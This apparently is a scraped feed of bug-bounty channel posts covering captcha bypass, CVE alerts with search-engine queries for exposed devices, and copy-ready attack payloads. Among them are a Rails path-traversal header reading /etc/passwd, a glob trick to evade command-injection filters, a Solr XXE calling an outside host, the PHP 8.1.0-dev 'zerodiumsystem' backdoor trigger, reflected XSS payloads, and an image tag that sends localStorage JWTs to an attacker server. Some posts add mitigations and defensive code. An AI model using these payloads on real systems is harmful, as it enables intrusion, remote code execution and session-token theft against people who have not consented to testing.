CyberSec Playground | Learn ethical hacking ⚡️
Welcome to CyberSec Playground! A community to learn, explore, and master penetration testing and bug bounty, ethical hacking, and all things cybersecurity.
Backup : https://t.me/fatherofbits
cybersecplayground.com
#BugBounty #Hacking
🚀 Captcha Bypass Techniques for Efficient Server Testing 🚀

Bypassing captchas can make server testing and automation easier. It's important to note that this is for testing purposes only, and the goal isn’t to compromise security, but to optimize workflows. Here are some methods to consider:

🔑 1. Parameter Manipulation
Omit Captcha Parameter: Skip the captcha parameter and try switching the HTTP method (e.g., POST → GET) or the data format (form data → JSON).
Submit Empty Captcha: Send the captcha parameter with no value.


🔍 2. Value Extraction & Reuse
Inspect Source Code: Look for captcha values hidden in the page’s source code.
Analyze Cookies: Check cookies for stored captcha values that might be reused.
Reuse Old Captcha: If a captcha was solved successfully, try using the same value. (Note: It may expire.)
Session Manipulation: Try reusing the same captcha value across different sessions or use the same session ID.


🤖 3. Automation & Recognition
Solve Math Captchas: Automate the calculation process for captchas involving simple math.
Image Recognition:
For image-based captchas, identify unique images (use MD5 hashes if limited).
Use OCR (Optical Character Recognition) tools like Tesseract to automate reading characters from images.


⚙️ 4. Additional Techniques
Rate Limit Testing: See if there are submission limits and find ways to bypass or reset them.
Use Third-Party Services: Leverage captcha-solving APIs or services.
Session & IP Rotation: Rotate your session IDs and IP addresses frequently to avoid detection.
User-Agent Manipulation: Change the User-Agent and headers to simulate different browsers or devices.
Audio Captcha Solving: Use speech-to-text services for audio captchas.


💡 Note: These techniques are meant for testing and automating workflows, not for bypassing security measures maliciously. Always ensure your actions are ethical and legal. 🔒

#bypass #Captcha #tricks #hacktricks
🚨 TP-Link Vulnerability CVE-2024-54887: Remote Code Execution 🚨

A critical vulnerability in TP-Link devices (CVE-2024-54887) has been discovered, allowing attackers to remotely execute code. This flaw could expose users to significant security risks if left unaddressed. Here’s everything you need to know:

💡 What is CVE-2024-54887?
This vulnerability affects TP-Link routers and smart home devices, and it allows attackers to exploit a remote code execution (RCE) flaw. If exploited, an attacker can gain full control over the affected device.


⚠️ Risk of Exploitation
Remote Code Execution (RCE): Attackers can remotely run arbitrary code on the device, allowing them to gain control and potentially compromise the entire network.
Full Device Compromise: With RCE, an attacker can steal sensitive data, alter device configurations, or launch further attacks within the local network.
Impact on IoT Devices: The vulnerability affects a range of TP-Link devices, including routers and IoT products, which could be targeted for botnet attacks, espionage, or other malicious activities.


🛠 How Does the Exploit Work?
Exploiting the Vulnerability: Attackers can send specially crafted requests to the affected TP-Link devices, bypassing authentication mechanisms and executing arbitrary commands.
Exploitation via HTTP Requests: The vulnerability is triggered by manipulating HTTP requests to the vulnerable endpoint. Once triggered, it grants the attacker the ability to execute malicious commands on the device.


💥 Proof of Concept (PoC)
Exploiting the Bug: A PoC exploit has been released, demonstrating how easily this vulnerability can be triggered. It shows how an attacker can interact with a vulnerable device remotely and execute arbitrary code.
Code Execution Risk: The PoC highlights how the exploit can bypass authentication and escalate privileges, potentially leading to device takeover and exploitation.


🛡 How to Protect Yourself
Update Your Firmware:
TP-Link has released a patch to fix the vulnerability. Ensure your device is updated to the latest firmware version that addresses CVE-2024-54887.

Disable Remote Management:
Disable remote management features on your TP-Link device if you don’t need them, as this reduces the attack surface for potential exploits.

Network Segmentation:
Use network segmentation to isolate IoT devices from critical systems, making it harder for attackers to move laterally within your network.

Monitor Network Traffic:
Watch for unusual network traffic patterns, especially HTTP requests targeting your device’s IP, which may indicate exploitation attempts.

Use Strong Authentication:
Ensure strong passwords and two-factor authentication (2FA) are enabled for device access, reducing the chance of successful attacks.


📝 Key Takeaway:
The TP-Link vulnerability CVE-2024-54887 poses serious RCE risks to affected devices. Immediate patching, disabling remote management, and securing network access are critical steps to mitigate potential exploitation.



ZoomEye query:
app="TP-LINK TL-WR940N WAP httpd"
6k+ results found on ZoomEye.


ZoomEye Link: https://zoomeye.ai

Refer: https://securityonline.info/

#RCE #Cyberspacemapping #cybersecurity #ZoomEye #infosec2024
If your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug, it can still be found.

Intercept the request in Burp and replace the Accept header with:
`Accept: ../../../../../../../../../../etc/passwd{{` 

#bugbountytips
🚀 HExHTTP: Advanced HTTP Header Testing Tool 🚀

HExHTTP is a Python-based tool designed to analyze HTTP headers for vulnerabilities and identify unusual behaviors in web applications. It's ideal for security researchers and penetration testers.

🌟 Features:

- Perform in-depth tests on HTTP headers.
- Detect potential vulnerabilities and security misconfigurations.
- Support for custom headers, user agents, authentication, and more.

📥 Get Started:

Check out the full details and installation instructions:
🔗 https://github.com/c0dejump/HExHTTP

#CyberSecurity #PenTesting #HTTPHeaders #HExHTTP #BugBounty #EthicalHacking #WebSecurity #PythonTools #InfoSec #VulnerabilityTesting
⚠️ Alert ⚠️

CVE-2025-21298 : Windows OLE Remote Code Execution Vulnerability

🔥PoC : https://github.com

🧐 Deep Dive : https://redcytadel.com

🔗 Hunter Link: https://hunter.how

🔍 Query

HUNTER :
product.name="Outlook Web App"

FOFA :
product="Microsoft-Outlook"


📰 Refer: https://securityonline.info

#WINDOWS #Outlook #hunterhow #infosec #infosecurity #OSINT #Vulnerability
A neat trick for bypassing WAF/filters while testing for OS command injection vulnerabilities.

Use shell globbing / wildcard expansion. Here is an example:

`cat /e*c/p*s*d` is equivalent to `cat /etc/passwd`. But how?

Before cat runs, the shell expands the glob pattern `/e*c/p*s*d` to match actual files and directories in the filesystem.

`/e*c`: The shell interprets this as "any path starting with /e, followed by zero or more characters (*), ending with c."

`/p*s*d`: This matches a path or file name starting with p, followed by zero or more characters (*), then s, then zero or more characters (*), then d.
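The detection-side view of the same expansion, as an added example that is not part of the original post: a filter that only looks for the literal string "/etc/passwd" misses the glob form, so this helper expands each glob token in a request value against a small constructed list of sensitive paths. The sample values and the path list are constructed; blocklisting remains a stopgap, and the real fix is never to pass user input to a shell.

```javascript
// Added example (not from the original post): expand shell glob tokens in a
// request value against a constructed list of sensitive paths, so a detection
// rule catches "/e*c/p*s*d" as well as the literal "/etc/passwd".

const SENSITIVE_PATHS = ['/etc/passwd', '/etc/shadow', '/proc/self/environ']; // constructed

// Turn one shell glob into an anchored regex. '*' and '?' never cross a '/'
// boundary, matching how the shell expands them one path segment at a time.
function globToRegex(glob) {
  let re = '^';
  for (const ch of glob) {
    if (ch === '*') re += '[^/]*';
    else if (ch === '?') re += '[^/]';
    else re += ch.replace(/[.+^${}()|[\]\\]/g, '\\$&');
  }
  return new RegExp(re + '$');
}

// Return every sensitive path that some absolute-path token in `value`
// would expand to; an empty array means nothing in the list matched.
function sensitivePathsReferenced(value) {
  const tokens = value.split(/\s+/).filter(t => t.startsWith('/'));
  const hits = new Set();
  for (const tok of tokens) {
    const re = globToRegex(tok);
    for (const p of SENSITIVE_PATHS) if (re.test(p)) hits.add(p);
  }
  return [...hits];
}

// Sample request values (constructed) as a WAF rule would see them.
const SAMPLE_VALUES = ['report.txt', 'x; cat /e*c/p*s*d', '/etc/*', 'ls /tmp'];

// Map each sample value to the sensitive paths it could reach.
function scanSamples() {
  return SAMPLE_VALUES.map(v => ({ value: v, hits: sensitivePathsReferenced(v) }));
}
```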

#bugbountytips #hacking
This payload can be used for Client Side Template injection and Reflected XSS, perhaps a code injection can be triggered in the background

🚀 Payload :
'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o

#bugbountytips #BugBounty #payload #cybersecurity
🔍 Bystander: Passive Web Vulnerability Detection Tool 🔍

Overview: Bystander is a Chrome extension that passively monitors network requests to identify potential web vulnerabilities directly within your browser. As you browse, Bystander alerts you to any detected security issues, enhancing your web security awareness.

Key Features:
- Vulnerability Detection: Identifies actual web vulnerabilities such as Cross-Site Request Forgery (CSRF) and Clickjacking.

- Code Sink Alerts: Detects potential code injection points, including NoSQL Injection (NoSQLi), Server-Side Template Injection (SSTI), and Server-Side Includes (SSI).

- API Token Leakage: Alerts you if API tokens are exposed during your browsing sessions.

- Personally Identifiable Information (PII) Monitoring: Notifies you of potential leaks of sensitive information like PAN numbers or hash disclosures.

- Insight Gathering: Observes and reports on staging domains, admin dashboards, and other critical elements in frontend code and network traffic.


Installation Steps:
- Download: Clone or download the Bystander repository from GitHub.

- Load Extension: In your Chromium-based browser (e.g., Chrome), navigate to Settings > Extensions and enable Developer Mode.

- Add Bystander: Click on "Load unpacked" and select the Bystander folder you downloaded.


For more detailed information and to access the source code, visit the Bystander GitHub repository:
https://github.com/itsdivyanshjain/Bystander
See an Apache Solr GET/POST to /select?

Set the 'q' parameter to the following for an XXE injection:

/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://collab.burp.net"><a></a>'}


#infosec #cybersec #bugbountytips
If you find PHP 8.1.0-dev, try RCE & SQLi:
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');

#bugbounty #bugbountytips #rce #sqli #cybersecurity
CVE-2024-9047: WordPress File Upload plugin for WordPress is vulnerable to a Path Traversal vulnerability in all versions up to, and including, 4.24.11 via the wfu_file_downloader.php...
exploitfinder.com/dbexploit/expl…
⛏️ Find Leaked Credentials Using Google Chrome dev Tools (The Best Way)

🔗 https://github.com/h4x0r-dz/Leaked-Credentials/

#bugbountytips #bugbounty #infosec #hacker #hacking
🚨CVE-2024-55591: Fortinet FortiOS Authentication Bypass Proof of Concept

🔗: https://github.com/watchtowrlabs...
🚨 Critical Vulnerability Alert: Fortinet FortiOS Authentication Bypass (CVE-2024-55591) 🚨

**Overview:**
A significant security flaw has been identified in Fortinet's FortiOS and FortiProxy systems, allowing remote attackers to gain super-admin privileges without proper authentication. This vulnerability is actively being exploited in the wild. ([FortiGuard](https://www.fortiguard.com/psirt/FG-IR-24-535))


**Technical Details:**
- **Vulnerability ID:** CVE-2024-55591
- **Affected Products:**
  - FortiOS versions 7.0.0 through 7.0.16
  - FortiProxy versions 7.0.0 through 7.0.19 and 7.2.0 through 7.2.12


**Impact:**
Allows attackers to gain super-admin privileges via crafted requests to the Node.js websocket module. ([NVD](https://nvd.nist.gov/vuln/detail/cve-2024-55591))


**Proof of Concept:**
A proof-of-concept (PoC) exploit has been released by watchTowr Labs, demonstrating how this vulnerability can be leveraged to execute commands with super-admin privileges. The PoC is available on GitHub. ([GitHub](https://github.com/watchtowrlabs/fortios-auth-bypass-poc-CVE-2024-55591))


**Mitigation:**
Fortinet has acknowledged the issue and is expected to release patches. Administrators are advised to monitor official Fortinet communications for updates and apply patches promptly. In the meantime, consider restricting access to management interfaces and implementing network segmentation to mitigate potential exploitation.
quick Linux tip 💡

In Linux, you can use the pgrep command to find the PID of a certain process based on its name, pattern, or other criteria.

$ pgrep name

You can also use pidof, but it only works with exact binary names and doesn't support pattern matching.


follow us for more great tips! 🐧😎

#cybersecurity #BugBounty #bugbountytips #linuxtips
🌟 bugbountytip

🌟 403 Successful bypass

🌟 add ../ between two UUIDs to bypass 403


#BugBounty #bugbountytips #BugHunter #bug #web2 #web3 #ethicalhacking
🚨 XSS Payload : Stealing JWT from Local Storage 🚨

A malicious XSS payload can be used to extract JSON Web Tokens (JWTs) stored in localStorage and send them to an attacker-controlled server. Here's a simple yet dangerous example:



<img src='https://<attacker-server>/yikes?jwt='+JSON.stringify(localStorage);'--!>


🛠 How It Works:
This payload injects an <img> tag into a vulnerable webpage.
The src attribute is set to an attacker's server, appending the contents of localStorage (which may contain JWTs or sensitive data).
When executed, the victim's browser sends their JWTs to the attacker's server.


🔥 Why Is This Dangerous?
Attackers can hijack sessions and gain unauthorized access.
Sensitive tokens (JWT, API keys) can be stolen and misused.
If exploited on an admin panel, attackers might escalate privileges.


🛡 How to Prevent It?
✔️ Use HTTP-Only Cookies: Store authentication tokens in cookies with the HttpOnly and Secure flags to prevent JavaScript access.

✔️ Implement CSP (Content Security Policy): Restrict inline scripts and unauthorized domains.

✔️ Sanitize User Input: Use libraries like DOMPurify to prevent injecting malicious HTML.

✔️ Validate & Escape Data Properly: Ensure user inputs are validated before rendering.
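The first two mitigations above in code, as an added example that is not part of the original post: `sessionCookieHeader` builds a Set-Cookie value that page script cannot read, and `cspAllows` is a minimal Content-Security-Policy evaluator used to confirm that the image-based exfiltration described above would be refused by the hardened policy. The attacker and application hostnames are constructed.

```javascript
// Added example (not from the original post): hardened Set-Cookie and CSP
// headers, plus a small CSP evaluator to check the policy against the
// <img>-based exfiltration above. Hostnames below are constructed.

// HttpOnly keeps the token out of document.cookie, Secure keeps it off
// plaintext HTTP, SameSite=Strict keeps it out of cross-site requests.
function sessionCookieHeader(name, value, maxAgeSeconds) {
  return `${name}=${encodeURIComponent(value)}; Max-Age=${maxAgeSeconds}; Path=/; ` +
    'Secure; HttpOnly; SameSite=Strict';
}

// Policy that only lets the page load its own scripts and images.
const HARDENED_CSP =
  "default-src 'self'; script-src 'self'; img-src 'self'; object-src 'none'; base-uri 'self'";

// Parse "directive src src; directive ..." into { directive: [sources] }.
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    if (name) policy[name] = sources;
  }
  return policy;
}

// Would a load of `url` under `directive` (e.g. 'img-src') be allowed for a page
// at `pageOrigin`? Handles 'self', 'none', '*' and host sources (optional scheme
// and "*." prefix); enough for the check this example makes.
function cspAllows(header, directive, url, pageOrigin) {
  const policy = parseCsp(header);
  const sources = policy[directive] || policy['default-src'] || ['*'];
  const target = new URL(url);
  const page = new URL(pageOrigin);
  return sources.some(src => {
    if (src === "'none'") return false;
    if (src === '*') return true;
    if (src === "'self'") return target.origin === page.origin;
    const host = src.replace(/^[a-z]+:\/\//i, '').replace(/\/.*$/, '');
    if (host.startsWith('*.')) return target.hostname.endsWith(host.slice(1));
    return target.hostname === host;
  });
}

// The exfiltration target from the payload above (attacker host constructed).
const EXFIL_URL = 'https://attacker.example/yikes?jwt=' + encodeURIComponent('{"token":"..."}');
```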


🚀 Stay Secure 🔐

#CyberSecurity #XSS #WebSecurity #EthicalHacking #BugBounty #JWT #PenTesting #InfoSec
🧨 Reflected XSS (RXSS) Payload Alert! 🧨

Reflected XSS (RXSS) vulnerabilities allow attackers to inject and execute malicious scripts by crafting special payloads. Here's a custom payload that triggers a prompt pop-up when injected into a vulnerable web application.

💣 Custom Payload:
"></a></td></tr></table><script>prompt('ijustcopypastelikeanoob');</script></html>//


🔥 How It Works:
- Breaks out of HTML structure using "></a></td></tr></table>.

- Injects a <script> tag that executes JavaScript.

- Triggers a prompt function, confirming code execution.


⚠️ Potential Dangers:
Can be modified to steal cookies, localStorage, or session tokens.
Attackers can perform actions on behalf of users (CSRF-like behavior).
Could be used to deface websites, spread malware, or execute phishing attacks.


🛡 How to Prevent RXSS?
✔️ Sanitize & Escape User Input: Remove or encode characters like <, >, ", '.

✔️ Use CSP (Content Security Policy): Restrict inline scripts and only allow trusted domains.

✔️ Validate Input on Server & Client Side: Never trust user-generated data.

✔️ Use Security Libraries: Implement DOMPurify or similar libraries to filter untrusted input.
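The "Sanitize & Escape User Input" step applied to a reflected search parameter, as an added example that is not part of the original post: `renderUnsafe` is a constructed vulnerable template that interpolates the query verbatim, and `renderEscaped` encodes the characters the post names before the value reaches HTML, so the payload above is displayed as text instead of executed.

```javascript
// Added example (not from the original post): output encoding for a reflected
// parameter, shown against the payload from this post. The templates and the
// search endpoint are constructed for illustration.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Encode a value for an HTML text node or a double-quoted attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, ch => HTML_ESCAPES[ch]);
}

// Vulnerable: the query is interpolated verbatim, so the leading "> closes the
// attribute and the closing tags that follow break out of the table, exactly
// the chain the post describes.
function renderUnsafe(query) {
  return `<table><tr><td><a href="/search?q=${query}">${query}</a></td></tr></table>`;
}

// Hardened: same template, value encoded in both the attribute and the text.
function renderEscaped(query) {
  const q = escapeHtml(query);
  return `<table><tr><td><a href="/search?q=${q}">${q}</a></td></tr></table>`;
}

// True when the rendered HTML contains a <script> element, which is what the
// reflected payload needs in order to run.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// The payload from the post, used as the reflected query value.
const REFLECTED_PAYLOAD =
  `"></a></td></tr></table><script>prompt('ijustcopypastelikeanoob');</script></html>//`;
```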


🚀 Stay Safe! 🔐

#CyberSecurity #RXSS #XSS #WebSecurity #BugBounty #EthicalHacking #InfoSec #PenTesting